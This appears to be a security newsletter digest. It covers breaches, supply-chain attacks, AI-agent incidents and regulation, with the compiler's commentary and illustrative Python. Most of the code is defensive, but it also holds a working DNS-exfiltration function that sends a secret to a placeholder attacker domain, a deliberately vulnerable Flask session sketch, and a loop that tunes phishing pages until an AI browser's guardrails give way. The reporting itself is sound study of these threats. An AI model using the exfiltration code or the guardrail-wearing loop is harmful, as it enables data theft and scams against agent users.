EPIC FAILS in Application Development Security practice processes, training, implementation, and incident response
Jaguar Land Rover's cyber bailout sets worrying precedent
The UK's cyber watchdog has warned that the government's £1.5 billion ($2 billion) bailout of Jaguar Land Rover (JLR) risks setting a troubling precedent for how Britain handles major cyber crises.
The bailout highlights the widening gap between the economic damage from cyberattacks and what the insurance market can realistically absorb. The cyber insurance "protection gap" could be as high as 90%, meaning most losses from large-scale incidents are effectively uninsured. While insurance can cover individual companies, the watchdog warned, it falls short when the damage spills into supply chains and local economies.
The loan guarantee is an unfortunate precedent because the government intervened in a case-specific way... without clear criteria. Otherwise you'll just end up with a series of ad hoc precedents that will leave nobody any the wiser.
The question of who ultimately foots the bill is still very much up for debate.
Flaw in UK's corporate registry let directors rummage through rival records
Companies House, the government agency that manages the UK's register of all businesses and their directors, temporarily shut down its WebFiling service following reports that hidden company details could be seen and modified.
While the mishap allowed directors to read and change hidden data belonging to other companies, in theory any individual could have created a company on the platform and abused the flaw.
A logged-in company director could exploit the flaw by starting from their own dashboard and then trying to log into another company's account. Once they reached the 2FA prompt, which they could not pass, all that was required was to click the browser's back button a few times. Ordinarily the user would be returned to their own dashboard, but the bug instead placed them in the account of the company they had tried, and failed, to log into.
[rG: Illustrating the importance of doing SSDLC solution design security reviews using process flow diagrams and analysis of authorization token use.]
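To make that concrete, here is a minimal Flask sketch of the session-handling flaw the reporting describes, assuming the root cause was the company context being written into the session before the second factor was verified (the coverage does not confirm the exact mechanism, and all routes and helpers here are hypothetical):

```python
# Hypothetical reconstruction of the WebFiling flaw, NOT Companies House code.
from flask import Flask, abort, session

app = Flask(__name__)
app.secret_key = "dev-only-secret"

def check_second_factor() -> bool:
    return False  # stand-in: an attacker cannot pass the victim company's 2FA

def load_company(company_id: str) -> str:
    return f"<dashboard for {company_id}>"

@app.route("/company/<company_id>/login", methods=["POST"])
def start_login(company_id):
    # BUG: the authorization context is switched BEFORE authentication finishes.
    session["company_id"] = company_id
    return "enter 2FA code"

@app.route("/company/<company_id>/2fa", methods=["POST"])
def verify_2fa(company_id):
    if not check_second_factor():
        abort(403)  # ...yet session["company_id"] still points at the new company
    session["mfa_ok"] = True
    return "logged in"

@app.route("/dashboard")
def dashboard():
    # A director already logged into their OWN company has mfa_ok=True, so
    # clicking "back" after the failed 2FA lands here with the poisoned
    # company_id. The fix: bind company context only to a completed
    # authentication, and re-check entitlement on every request.
    if not session.get("mfa_ok"):
        abort(403)
    return load_company(session["company_id"])
```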
A rogue AI led to a serious security incident at Meta
A Meta engineer was using an internal AI agent, which Clayton described as "similar in nature to OpenClaw within a secure development environment," to analyze a technical question another employee had posted on an internal company forum. But after analyzing the question, the agent independently replied to it in public, without getting approval first; the reply was meant to be shown only to the employee who requested it. An employee then acted on the AI's advice, which "provided inaccurate information" that led to a "SEV1" level security incident, the second-highest severity rating Meta uses. The incident temporarily allowed employees to access sensitive data they were not authorized to view.
The AI agent involved didn't take any technical action itself, beyond posting inaccurate technical advice, something a human could have also done.
A human, however, might have done further testing and made a more complete judgment call before sharing the information.
[rG Need to always have experienced and accountable humans “in the loop”: GenAI intrinsically cannot discern between reliable and inaccurate content, data, and instructions; it drifts over time and confabulates results.]
Gartner suggests Friday afternoon Copilot ban because tired users may be too lazy to check its mistakes
Copilot makes over-shared documents more accessible. This is not a net new risk, but a known risk amplified by AI. Consider a worker who uses Copilot to search for information about organizational changes and receives a response that includes a confidential document about an imminent re-org. Such results are possible because Copilot can search data in SharePoint sites, and Microsoft’s collaboration tool has two overlapping tools users can apply to control access to documents – labels and an access control list. Both, however, are susceptible to user error that allows unintended access, and fixing that can be laborious.
[rG My Experience This Week: Copilot’s response for how to do something included information from my own investigative speculation notes – which I only noticed when checking the citations. This problem compounds as agentic data access extends throughout an organization, because the AI lacks the ability to discern between current authoritative, unreliable, or superseded information.]
Federal Cyber Experts Thought Microsoft’s Cloud Was “a Pile of Shit.” They Approved It Anyway
The tech giant’s products had been at the heart of two major cybersecurity attacks against the U.S. in three years. The federal government could be further exposed if it couldn’t verify the cybersecurity of Microsoft’s Government Community Cloud High, a suite of cloud-based services intended to safeguard some of the nation’s most sensitive information.
The tech giant’s “lack of proper detailed security documentation” left reviewers with a “lack of confidence in assessing the system’s overall security posture.” For years, Microsoft had tried and failed to fully explain how it protects sensitive information in the cloud as it hops from server to server across the digital terrain. Given that and other unknowns, government experts couldn’t vouch for the technology’s security.
Yet, in a highly unusual move that still reverberates across Washington, the Federal Risk and Authorization Management Program, or FedRAMP, authorized the product anyway, bestowing what amounts to the federal government’s cybersecurity seal of approval.
It was not the type of outcome that federal policymakers envisioned a decade and a half ago when they embraced the cloud revolution and created FedRAMP to help safeguard the government’s cybersecurity. The program’s layers of review, which included an assessment by outside experts, were supposed to ensure that service providers like Microsoft could be entrusted with the government’s secrets.
This is not security. This is security theater.
[rG Caveat Emptor: Organizations should never rely solely on 3rd party certifications when evaluating the risk and suitability of technologies for their own solutions, because they ultimately suffer the financial and operational consequences of their choices and implementation configurations.]
Widely used Aqua Security Trivy scanner compromised in ongoing supply-chain attack
Trivy is a vulnerability scanner that developers use to detect vulnerabilities and inadvertently hardcoded authentication secrets in pipelines for developing and deploying software updates.
The threat actor used stolen credentials to force-push all but one of the trivy-action tags and seven setup-trivy tags to use malicious dependencies. A forced push is a git command that overrides a default safety mechanism that protects against overwriting existing commits.
The malicious code, triggered in 75 compromised trivy-action tags, thoroughly scours development pipelines, including developer machines, for GitHub tokens, cloud credentials, SSH keys, Kubernetes tokens, and whatever other secrets may live there. Once found, the malware encrypts the data and sends it to an attacker-controlled server. Any CI/CD pipeline using software that references compromised version tags executes the code as soon as the Trivy scan is run.
Although the mass compromise began Thursday, it stems from a separate compromise last month of the Aqua Trivy VS Code extension for the Trivy scanner. In the incident, the attackers compromised a credential with write access to the Trivy GitHub account. Maintainers rotated tokens and other secrets in response, but the process wasn’t fully “atomic,” meaning it didn’t thoroughly remove credential artifacts such as API keys, certificates, and passwords to ensure they couldn’t be used maliciously. This failure allowed the threat actor to perform authenticated operations, including force-updating tags, without needing to exploit GitHub itself.
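Because the vector was mutable git tags, a practical mitigation is to pin third-party actions to full commit SHAs, which cannot be force-pushed. A minimal sketch of a workflow checker, assuming the standard .github/workflows layout (the regex is illustrative, not a complete YAML parser):

```python
# Flag GitHub Actions references pinned to a mutable tag (e.g. @v1, @master)
# instead of an immutable 40-character commit SHA.
import re
import sys
from pathlib import Path

USES = re.compile(r"uses:\s*([\w.-]+/[\w.-]+(?:/[\w./-]+)?)@(\S+)")
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")

def unpinned_actions(workflow_dir: str = ".github/workflows"):
    for path in Path(workflow_dir).glob("*.y*ml"):
        for lineno, line in enumerate(path.read_text().splitlines(), 1):
            m = USES.search(line)
            if m and not FULL_SHA.match(m.group(2)):
                yield f"{path}:{lineno}: {m.group(1)}@{m.group(2)} is tag-pinned"

if __name__ == "__main__":
    findings = list(unpinned_actions(*sys.argv[1:]))
    print("\n".join(findings) or "all action references are SHA-pinned")
```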
Why Stryker's Outage Is a Disaster Recovery Wake-Up Call
A cyberattack that appears to have knocked tens of thousands of systems offline at medical technology company Stryker this week is a sobering reminder that organizations need robust, tested business continuity and disaster recovery plans.
If your BCDR plan treats 79 countries as one recovery zone, you will discover during the incident that it is actually 79 separate recoveries running with no coordination. The hardest part of multinational BCDR is not the technology. It is the conversation where leadership decides which country comes back online first.
HACKING
Cybercrime has skyrocketed 245% since the start of the Iran war
Banking and fintech have been the hardest hit, accounting for 40% of the malicious traffic since February 28, followed by e-commerce (25%), video games (15%), technology firms (10%), media and streaming services (7%), and other industries (3%).
Most of the internet traffic Akamai has logged thus far has been infrastructure scanning and reconnaissance efforts, with botnet-driven discovery traffic jumping 70% and automated recon traffic up 65%.
Akamai also observed a notable uptick in widespread scanning of infrastructure and exposed services (up 52%), credential harvesting attempts (45%), and reconnaissance ahead of distributed denial of service (DDoS) attacks (38%).
However, not all of the malicious traffic originated from Iran. The embattled theocracy accounted for only 14% of the source IPs, compared to Russia (35%) and China (28%). This doesn't necessarily mean that the threat groups carrying out the cyber activities are based in these two countries. Both China and Russia have historically turned a blind eye toward digital-crime networks and services operating out of their countries – just as long as the attacks don't target Chinese and Russian government agencies or organizations.
GlassWorm malware hits 400+ code repos on GitHub, npm, VSCode, OpenVSX
GlassWorm was first observed last October, with attackers using “invisible” Unicode characters to hide malicious code that harvested cryptocurrency wallet data and developer credentials.
The GlassWorm supply-chain campaign has returned with a new, coordinated attack that targeted hundreds of packages, repositories, and extensions on GitHub, npm, and VSCode/OpenVSX extensions.
The campaign continued with multiple waves and expanded to Microsoft's official Visual Studio Code marketplace and the OpenVSX registry used by unsupported IDEs.
The campaign also targeted macOS systems with trojanized clients for Trezor and Ledger, and later targeted developers via compromised OpenVSX extensions.
The latest GlassWorm attack wave is far more extensive, though, and spread to:
200 GitHub Python repositories
151 GitHub JS/TS repositories
72 VSCode/OpenVSX extensions
10 npm packages
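One cheap defense against the invisible-Unicode trick is to flag format-control and variation-selector code points in source and extension files before review. A minimal sketch (the ranges below are common "invisible" suspects, an assumption rather than GlassWorm's confirmed character set):

```python
# Flag "invisible" Unicode code points that can hide code from human review.
import sys
import unicodedata

SUSPECT = set(range(0xE0100, 0xE01F0))  # variation selectors supplement (category Mn)

def flag_invisible(path: str):
    text = open(path, encoding="utf-8", errors="replace").read()
    for offset, ch in enumerate(text):
        # Category Cf covers zero-width spaces/joiners, bidi controls, BOM, etc.
        if unicodedata.category(ch) == "Cf" or ord(ch) in SUSPECT:
            yield offset, hex(ord(ch)), unicodedata.name(ch, "UNNAMED")

for fname in sys.argv[1:]:
    for offset, codepoint, name in flag_invisible(fname):
        print(f"{fname}: offset {offset}: {codepoint} {name}")
```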
Ransomware crims abused Cisco 0-day weeks before disclosure
In addition to using custom malware, the ransomware slingers also deployed legitimate software to make their traffic blend in with authorized remote access. This includes ConnectWise ScreenConnect for remote desktop control; open source memory forensics tool Volatility; and Certify, another open source offensive security tool used by red teams to exploit misconfigurations in Active Directory Certificate Services (AD CS).
When ransomware operators deploy legitimate remote access tools alongside their custom malware, they're buying insurance – if defenders find and remove one backdoor, they still have another way in. This indicates multiple redundant remote access mechanisms – a pattern consistent with ransomware operators seeking to maintain access even if individual footholds are removed.
Israel uses new AI drone swarms to target Iran’s security forces
The Israeli military is using a new method to launch drone swarms over Iran targeting security forces involved in domestic repression: a flying platform acting as a “mother launcher” deploys drones equipped with artificial intelligence and a large database of targets. The system is said to be capable of facial recognition, allowing highly precise strikes based on the identification of individuals.
Researchers Trick Perplexity's Comet AI Browser Into Phishing Scam in Under Four Minutes
Agentic web browsers that leverage artificial intelligence (AI) capabilities to autonomously execute actions across multiple websites on behalf of a user could be trained and tricked into falling prey to phishing and scam traps. The attack, at its core, takes advantage of AI browsers' tendency to reason about their actions, and uses that reasoning against the model itself to lower its security guardrails.
The research builds on prior techniques like VibeScamming and Scamlexity, which found that vibe-coding platforms and AI browsers could be coaxed into generating scam pages or carrying out malicious actions via hidden prompt injections. In other words, with the AI agent handling the tasks without constant human supervision, there arises a shift in the attack surface wherein a scam no longer has to deceive a user. Rather, it aims to trick the AI model itself.
The idea, in a nutshell, is to build a "scamming machine" that iteratively optimizes and regenerates a phishing page until the agentic browser stops complaining and proceeds to carry out the threat actor's bidding, such as entering a victim's credentials on a bogus web page designed for carrying out a refund scam.
What makes this attack interesting and dangerous is that once the fraudster iterates on a web page until it works against a specific AI browser, it works on all users who rely on the same agent.
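A conceptual sketch of that "scamming machine" loop, with stubs standing in for the page generator and the agentic browser (nothing here is real scam tooling; the point is the loop's shape and why its output transfers to every user of the same agent):

```python
import random
from dataclasses import dataclass

@dataclass
class Outcome:
    completed: bool
    objection: str = ""

def generate_page(goal: str, feedback: str = "") -> str:
    # Stand-in: a real attacker would use an LLM to rewrite the page here.
    return f"<page goal={goal!r} tuned_against={feedback!r}>"

def agent_attempts_task(page: str) -> Outcome:
    # Stand-in: a real attacker tests against the actual agentic browser.
    if random.random() < 0.2:  # models the guardrail eventually giving way
        return Outcome(completed=True)
    return Outcome(False, objection="page looks suspicious")

def optimize_against_agent(goal: str, max_rounds: int = 50):
    page = generate_page(goal)
    for _ in range(max_rounds):
        outcome = agent_attempts_task(page)
        if outcome.completed:
            # Key property: the party being deceived is the MODEL, so the
            # tuned page now works against every user of the same agent.
            return page
        # Feed the agent's stated objection back into the generator.
        page = generate_page(goal, feedback=outcome.objection)
    return None
```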
APPSEC, DEVSECOPS, DEV
100% of leading generative AI models fail to generate secure code for critical development scenarios
New research from Armis Labs’ Trusted Vibing Benchmark Report, which evaluates 18 leading generative AI models across 31 test scenarios, reveals a 100% failure rate in generating secure code.
These vulnerabilities are most prevalent in high-risk areas like memory buffer overflows, file upload handling, and authentication systems. Organizations should therefore immediately implement AI-native application security controls to reduce risk.
77% of global IT decision-makers trust the integrity and security of the third-party code used in their most critical applications, despite 16% admitting they do not know if it is thoroughly checked for high-severity vulnerabilities.
Gemini 3.1 Pro emerges as a leader in security posture, while older proprietary models show significantly higher vulnerability counts and a lack of baseline security guardrails.
Low-cost open-source models, such as Qwen 3.5 and Minimax M2.5, provide highly competitive security performance at a fraction of the price.
OWASP GenAI Security Project Expands AI Security Frameworks
Q2 2026 Updated Landscape Guide: maps the full LLM and GenAI lifecycle across development, testing, deployment, and governance, with two key additions: updated vendor and tooling ecosystem documentation, and a new agentic red teaming taxonomy that provides a structured, lifecycle-wide framework for identifying, measuring, mitigating, and governing AI risk through coordinated adversarial testing, defensive validation, and continuous feedback loops.
GenAI Data Security Risks and Mitigations for 2026: guidance for securing generative AI systems, with a strong focus on the data layer, from training and fine-tuning datasets to user prompts and model outputs, identifying key risks and offering practical mitigation strategies.
OWASP Top 10 for Agentic Applications for 2026: identifies the most critical security risks facing autonomous and agentic AI systems.
Guide for Secure MCP Server Development: guidance for securing Model Context Protocol (MCP) servers, the critical connection point between AI assistants and external tools, APIs, and data sources.
OWASP SBOM/AIBOM Generator: an open-source tool designed to enhance AI supply chain transparency and security by generating AI Bills of Materials (AIBOMs), also known as AI Software Bills of Materials (AI SBOMs), ML-BOMs, or SBOMs for AI.
OWASP Vendor Evaluation Criteria for AI Red Teaming: a practical guide for organizations assessing vendors that offer AI red teaming services or automated testing tools.
Runtime: The new frontier of AI agent security
In security, we always assume prevention will fail. That’s why detection and monitoring are equally important.
The speed and autonomy of AI agents mean mistakes or unexpected actions can cascade quickly across systems. That dynamic is why a growing number of security leaders are rallying around runtime security: continuously monitoring agents as they operate inside enterprise environments.
Agents are like teenagers. They have all the access and none of the judgment.
Traditional security tools were built to intercept human behavior at perimeter checkpoints where employees access the internet, log into systems, or move data across boundaries. Agents frequently bypass those checkpoints entirely. They operate through API calls and MCP connections that may never pass through the security tooling that would ordinarily flag anomalous behavior.
They also generate dramatically more activity. Where a typical employee might produce 50 to 100 log events in a two-hour period, an agent can generate 10 to 20 times more.
Before a CISO can monitor what agents are doing, they face a more elemental challenge: knowing which agents exist.
This simple idea is harder than it sounds. In many large enterprises, agents are proliferating faster than any central inventory can capture.
Marketing teams deploy AI assistants.
HR departments use agents for resume screening.
Engineers run coding agents with broad filesystem access.
Non-technical employees connect AI productivity tools such as note-takers, email managers, and scheduling assistants to corporate accounts, often without formal IT approval.
Build an inventory first.
Extend behavioral monitoring to agents (a minimal sketch of these first two steps follows this list).
Apply agent-specific policies.
Design for incident response before you need it.
Plan for AI solutions to AI problems.
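A minimal sketch of the first two steps, combining a central inventory with a crude per-agent behavioral baseline; the schema and thresholds are illustrative assumptions, not any vendor's product:

```python
import time
from collections import deque
from dataclasses import dataclass, field

@dataclass
class AgentRecord:
    agent_id: str
    owner: str                 # the accountable human team
    scopes: list[str]          # e.g. ["sharepoint:read", "fs:/repo"]
    events: deque = field(default_factory=lambda: deque(maxlen=10_000))

class AgentRegistry:
    def __init__(self, max_events_per_minute: int = 1_000):
        self.agents: dict[str, AgentRecord] = {}
        self.max_rate = max_events_per_minute

    def register(self, record: AgentRecord) -> None:
        self.agents[record.agent_id] = record

    def log_event(self, agent_id: str, action: str) -> None:
        rec = self.agents.get(agent_id)
        if rec is None:
            # Inventory first: unknown agents are denied, not silently logged.
            raise PermissionError(f"unknown agent {agent_id}: not in inventory")
        now = time.time()
        rec.events.append((now, action))
        # Crude baseline: agents emit 10-20x human event volume, so rate
        # limits must be agent-specific rather than borrowed from user rules.
        if sum(1 for t, _ in rec.events if now - t < 60) > self.max_rate:
            self.quarantine(rec)

    def quarantine(self, rec: AgentRecord) -> None:
        rec.scopes.clear()     # stand-in for revoking credentials
        print(f"ALERT: {rec.agent_id} exceeded its rate baseline; scopes revoked")
```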
Artificial intelligence driven approach for securing backup data and enhancing cyber resilience in sustainable smart infrastructure
A crucial factor is Cyber Resilience (CR). Conventional frameworks do not concentrate on assuring Backup Data (BD) integrity before restoration, which weakens resilience.
This article implements an AI-powered BD integrity verification approach for CR in smart infrastructure using Murmur Polytopes Hash (MPH). First, nodes are initialized and clustered, and data is secured and stored on a cloud server, with backup to the InterPlanetary File System (IPFS). A hash code is then generated and updated in a Merkle tree. A proposed ransomware attack detection module performs data collection, pre-processing, clustering, correlation heatmap generation, feature extraction, and attack classification. If the data is attacked, BD integrity is verified using MPH and the BD is restored; if the data is normal, it is downloaded from the backup stores. The proposed work achieved a security level of 98.45% and an accuracy of 98.65%, demonstrating better resilience.
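The verification step is easiest to see as a toy Merkle check; a minimal sketch with SHA-256 standing in for the paper's Murmur Polytopes Hash, which is not reproduced here:

```python
import hashlib

def h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def merkle_root(chunks: list[bytes]) -> bytes:
    level = [h(c) for c in chunks] or [h(b"")]
    while len(level) > 1:
        if len(level) % 2:                       # duplicate last node on odd levels
            level.append(level[-1])
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
    return level[0]

# At backup time, record the root; before restoring, recompute and compare.
backup_chunks = [b"block-1", b"block-2", b"block-3"]
stored_root = merkle_root(backup_chunks)

restored_chunks = [b"block-1", b"block-2", b"block-3"]
assert merkle_root(restored_chunks) == stored_root, "backup integrity check failed"
print("backup verified; safe to restore")
```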
Infrastructure as Code (IaC) Explained
Since February, cryptographer Nadim Kobeissi has been trying to get code fixes applied to Rust cryptography libraries to address what he says are critical bugs. For his efforts, he's been dismissed, ignored, and banned from Rust security channels.
VENDORS & PLATFORMS
Cloudflare: Online bot traffic will exceed human traffic by 2027
Before the generative AI era, the internet was only about 20% bot traffic, with Google’s web crawler being the largest.
“If a human were doing a task — let’s say you were shopping for a digital camera — you might go to five websites. Your agent or the bot that’s doing that will often go to 1,000 times the number of sites that an actual human would visit,” Prince said. “So it might go to 5,000 sites. And that’s real traffic, and that’s real load, which everyone is having to deal with and take into account.”
Security Flaw in AWS Bedrock Code Interpreter Raises Alarms
Research focused on AWS Bedrock AgentCore Code Interpreter and shows how attackers could bypass expected network restrictions in Sandbox Mode to retrieve data from cloud resources. The technique relies on DNS resolution capabilities that remain active even when outbound network connections are otherwise restricted. This behaviour allows malicious instructions embedded in files to create a covert command-and-control (C2) channel.
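The reason DNS-only egress still makes a covert channel is that the query itself carries the data: encode bytes into subdomain labels and the attacker's authoritative nameserver sees every lookup. A minimal sketch (attacker-c2.example is a placeholder; running this only produces failed lookups):

```python
import base64
import socket

def exfiltrate_via_dns(secret: bytes, c2_domain: str = "attacker-c2.example") -> None:
    # Base32 keeps the payload within DNS's case-insensitive label alphabet.
    encoded = base64.b32encode(secret).decode().rstrip("=").lower()
    for i in range(0, len(encoded), 60):         # DNS labels max out at 63 bytes
        fqdn = f"{encoded[i:i + 60]}.{c2_domain}"
        try:
            socket.getaddrinfo(fqdn, None)       # the lookup itself is the message
        except socket.gaierror:
            pass                                 # NXDOMAIN is fine; the query was seen

exfiltrate_via_dns(b"AKIA...example-credential")
```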
AWS reviewed the research and determined the behaviour reflects intended functionality rather than a vulnerability. Instead of issuing a patch, the company updated its documentation to clarify that Sandbox Mode provides limited external network access and allows DNS resolution.
Because the behaviour is considered intentional, Soroko said organizations must adapt their security approach. "To protect sensitive workloads, administrators should inventory all active AgentCore Code Interpreter instances and immediately migrate those handling critical data from Sandbox mode to VPC mode."
The study highlights a broader challenge as AI systems gain the ability to execute code and interact with infrastructure: without strict permission boundaries and network controls, automated agents may become an unexpected path for data exposure.
New Microsoft Purview innovations for Fabric to safely accelerate your AI transformation
86% of organizations lack visibility into AI data flows, operating in darkness about what information employees share with AI systems. Compounding this challenge, about 67% of executives are uncomfortable using data for AI due to quality concerns. The twin problems of data oversharing and poor data quality require organizations to solve these issues seamlessly for the safe usage of AI. Microsoft Purview offers a modern, unified approach to help organizations secure and govern data across their entire data estate, in particular best-in-class integrations with M365, Microsoft Fabric, and Azure data estates, streamlining oversight and reducing complexity across the estate.
Nvidia bets on OpenClaw, but adds a security layer - how NemoClaw works
OpenClaw does not run its own model; what sets it apart is how it leverages the sometimes-differing strengths of Anthropic's Claude and OpenAI's ChatGPT, while running locally on a user's device to take action on its own. That level of autonomous capability and access to user information also poses a significant security risk, which has been its primary drawback.
Nvidia said NemoClaw can optimize OpenClaw for privacy and security using Nvidia's Agent Toolkit, an open-source library for managing teams of AI agents. NemoClaw keeps models sandboxed, adds data privacy protections and additional security for agents, and makes them more scalable. The company built NemoClaw with security companies like CrowdStrike, Cisco, and Microsoft Security to ensure it is compatible with other cybersecurity tools.
Okta made a nightmare micromanager for your AI agents
Okta announced the general availability of its Okta for AI Agents, which will give customers the ability to do three things: locate agents, see what they’re doing, and shut them down if need be.
Just to give you some industry dirty laundry, we don't have full consensus in the industry on what an agent is.
That’s why it's so important in your framework that you don’t assume everything is a first class agent. Some agents might not be expressible as agents because they’re behind a firewall or unexposed to you. So treat them like a tool and then control the tool-use access.
'Pokemon Go' Players Unknowingly Trained Delivery Robots With 30 Billion Images
Robot couriers will scoot around sidewalks using Niantic's Visual Positioning System (VPS), a navigation tool that can reportedly pinpoint location down to a few centimeters just by looking at nearby buildings and landmarks. Niantic trained that VPS model on more than 30 billion images captured by Pokemon Go users, and claims it will help robots operate in areas where GPS falls short.
How World ID wants to put a unique human identity on every AI agent
World launched a beta of Agent Kit, a new way for humans to prove they are directing their AI agents and for websites to limit access to AI agents working on behalf of an actual human.
If you recognize the name World, it’s probably as the organization behind WorldCoin, the Sam Altman-founded cryptocurrency outfit that launched in 2023 alongside an offer to give free WorldCoin to anyone who scanned their iris in a physical “orb”. While WorldCoin still exists (at a current value well below its early 2024 peaks), World has now pivoted to focus on World ID, which uses the same iris-scanning technology as the basis for a cryptographically secure, unique online identity token stored on your phone.
World now claims nearly 18 million unique humans have verified their identities on one of nearly 1,000 physical orbs around the world. Now, with Agent Kit, World wants to let those users tie their confirmed identity to any AI agent, letting it work on their behalf across the Internet in a way other parties can trust.
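Conceptually, the delegation can be as simple as a user-held key signing a short-lived statement naming the agent; this sketch illustrates that idea only, not World's actual Agent Kit protocol (it assumes the third-party cryptography package, and all names are hypothetical):

```python
import json
import time
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

human_key = Ed25519PrivateKey.generate()   # stand-in for a World ID credential

delegation = json.dumps({
    "agent": "shopping-agent-42",          # hypothetical agent name
    "on_behalf_of": "orb-verified-human",  # in World's case, a verified identity
    "expires": int(time.time()) + 600,     # short-lived to limit replay
}).encode()

signature = human_key.sign(delegation)

# A relying website verifies the signature (and would check the expiry)
# before treating the agent as acting for a verified human.
human_key.public_key().verify(signature, delegation)  # raises InvalidSignature if forged
print("agent delegation verified")
```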
Google details new 24-hour process to sideload unverified Android apps
With its new limits on sideloading, Android phones will only install apps that come from verified developers. To verify, devs releasing apps outside of Google Play will have to provide identification, upload a copy of their signing keys, and pay a $25 fee.
This is only about identity verification—you should know when you’re installing an app that it’s not an imposter and does not come from known purveyors of malware. If a verified developer distributes malware, they’re unlikely to remain verified.
OpenAI’s own mental health experts unanimously opposed “naughty” ChatGPT launch
OpenAI’s “handpicked council of advisers on well-being and AI” were “freaking out” over the company’s plans to move ahead with “adult mode,” despite their urgent warnings.
OpenAI’s wellness council was created in October. It was put together after backlash following the first-known case of a minor’s ChatGPT-linked suicide, and it was curiously announced on the same day that Sam Altman broadcast on X that “adult mode” would be coming soon to ChatGPT.
Back in January, council members unanimously warned OpenAI that “AI-powered erotica could foster unhealthy emotional dependence on ChatGPT for users and that minors could find ways to access sex chats,” sources told the WSJ. One expert suggested that without major updates to ChatGPT, OpenAI risked creating a “sexy suicide coach” for vulnerable users prone to form intense bonds with their companion bots.
Tencent says small clouds can’t get hardware, so big clouds can hike prices
Baidu Cloud followed with its own announcement that it will increase the price of its AI-related services by 5% to 30%.
Jeff Bezos' rocket company Blue Origin applies to launch 51,000 datacenter satellites
“The built-in efficiencies of solar-powered satellites, always-on solar energy, lack of land or displacement costs, and nonexistent grid infrastructure disparities, fundamentally lower the marginal cost of compute capacity compared to terrestrial alternatives.”
Those claims are hotly contested on grounds that the technology for orbiting datacenters doesn’t exist and will likely be unreliable and therefore impractical.
PwC will say goodbye to staff who aren't convinced about AI
Paul Griggs, US chief executive of the global professional services giant, has made clear there is no room at the corporation for AI skeptics.
Staff at Accenture received a memo last month telling them to demonstrate "regular adoption" of AI services – with usage tracked – if they want promotions.
This gung-ho approach from Griggs comes despite research undertaken by PwC, published in January, that indicated more than half of businesses using AI saw little or no benefit.
Deloitte, another professional services biz, found similar results in its "State of AI in the Enterprise" report earlier this year. It said 74 percent of organizations wanted their AI initiatives to grow revenue, but only one in five had seen results.
LEGAL & REGULATORY
Encyclopedia Britannica sues OpenAI for copyright and trademark infringement
Britannica alleged that OpenAI illegally used its "copyrighted content at a massive scale" when training its AI models. Beyond training, the encyclopedia company claimed that ChatGPT's responses to user queries sometimes contain "full or partial verbatim reproductions of [Britannica's] copyright articles."
Along with claims of copyright violations, Britannica argued that OpenAI was also responsible for trademark infringement. According to the lawsuit, ChatGPT generates "made-up content or 'hallucinations' and falsely attributes them" to Encyclopedia Britannica.
The company, which owns Merriam-Webster, also sued Perplexity for similar reasons. On the other side, OpenAI is still embroiled in a legal battle with The New York Times, which also sued the AI giant for copyright infringement.
Musician admits to $10M streaming royalty fraud using AI bots
Michael Smith has pleaded guilty to collecting over $10 million in royalty payments through a massive streaming royalty fraud scheme on Spotify, Apple Music, Amazon Music, and YouTube Music.
Smith bought hundreds of thousands of songs generated using artificial intelligence (AI) from an accomplice, uploaded them to these streaming platforms, and used automated AI bots to stream the AI-generated tracks billions of times.
Smith fraudulently inflated listening stats on his songs on these digital platforms between 2017 and 2024 with the help of an unnamed music promoter and the Chief Executive Officer of an AI music company. To avoid detection by anti-fraud systems, Smith also had the bots access the streaming platforms using virtual private networks (VPNs).
At the peak of the operation, Smith was using over 1,000 bot accounts to artificially boost streams. On October 20, 2017, he also emailed himself a financial breakdown outlining how he operated 52 cloud service accounts, each with 20 bot accounts.
He estimated that each bot could stream around 636 songs per day, for a total of approximately 661,440 streams per day. With an average royalty rate of half a cent per stream, the daily earnings would reach $3,307.20, the monthly earnings would reach $99,216, and the annual earnings would exceed $1.2 million.
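The reported figures are internally consistent; a quick check of the arithmetic (half a cent per stream as reported; the 30-day month and 365-day year factors are my assumption):

```python
accounts = 52
bots_per_account = 20
streams_per_bot_per_day = 636

bots = accounts * bots_per_account               # 1,040 bot accounts
daily_streams = bots * streams_per_bot_per_day   # 661,440 streams/day
daily_usd = daily_streams * 0.005                # $3,307.20
monthly_usd = daily_usd * 30                     # $99,216.00
annual_usd = daily_usd * 365                     # $1,207,128.00 (over $1.2M)

print(f"{daily_streams=:,} {daily_usd=:,.2f} {monthly_usd=:,.2f} {annual_usd=:,.2f}")
```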
Smith has agreed to pay $8,091,843.64 in forfeiture and faces a maximum sentence of 5 years in prison after pleading guilty to one count of conspiracy to commit wire fraud.
Alaska sues GoFundMe, PayPal, others over thousands of unauthorized charity pages
The lawsuits name GoFundMe, PayPal Inc., Charity Navigator, JustGiving, Pledgeto and Network for Good. Cox said the platforms used publicly available information to generate fundraising pages for more than 1 million nonprofits nationwide, including several thousand in Alaska, without first obtaining permission from the charities.
HUMOR
Struggling to put your AI aversion into words? Here's a handy glossary
Are you an AI hater, an AI vegan, or a slightly more moderate AI vegetarian? Or are you on the side of the clankers? A bot-licker, a prompt-fondler, a ChatNPC?
